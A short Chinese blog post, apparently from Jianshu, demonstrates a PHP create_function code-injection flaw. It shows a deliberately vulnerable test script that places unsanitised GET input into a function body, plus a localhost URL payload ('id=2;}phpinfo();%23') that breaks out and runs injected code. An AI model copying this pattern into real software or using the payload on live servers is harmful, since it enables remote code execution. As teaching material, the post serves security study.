create_function函数注入漏洞

测试代码:

<?php

//02-8.php?id=2;}phpinfo();/*

$id=$_GET['id'];

$str2='echo  '.$a.'test'.$id.";";

echo $str2;

echo "<br/>";

echo "==============================";

echo "<br/>";

$f1 = create_function('$a',$str2);

echo "<br/>";

echo "==============================";

?>

攻击方式:

http://127.0.0.1/test.php?id=2;}phpinfo();%23 (这个也可以,图中也可以,道理都是一样的)

©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • 批处理学习及实际应用
    个人学习批处理的初衷来源于实际工作;在某个迭代版本有个BS(安卓手游模拟器)大需求,从而在测试过程中就重复涉及到...
    Luckykailiu阅读 4,761评论 0 11
  • 从bwapp学PHP代码注入
    0x00 背景 在bwapp的注入部分有一个个php injection,这是第一次接触,在做题的过程中查阅各种资...
    陈奕迅大佬阅读 1,575评论 2 1
  • 面向对象编程
    把当前目录作为Root Document只需要这条命令即可:php -S localhost:3300 也可以指定...
    绚烂的时光阅读 745评论 0 1
  • memcache
    1、memcache的概念? Memcache是一个高性能的分布式的内存对象缓存系统,通过在内存里维护一个统一的巨...
    桖辶殇阅读 2,266评论 2 12
  • zabbix的编译安装并发送通知邮件
    1.写在前面 本文主要介绍的是zabbix的编译安装过程,包含它的基础环境LNMP,虽然zabbix官方一般推荐的...
    天之蓝色阅读 2,561评论 0 16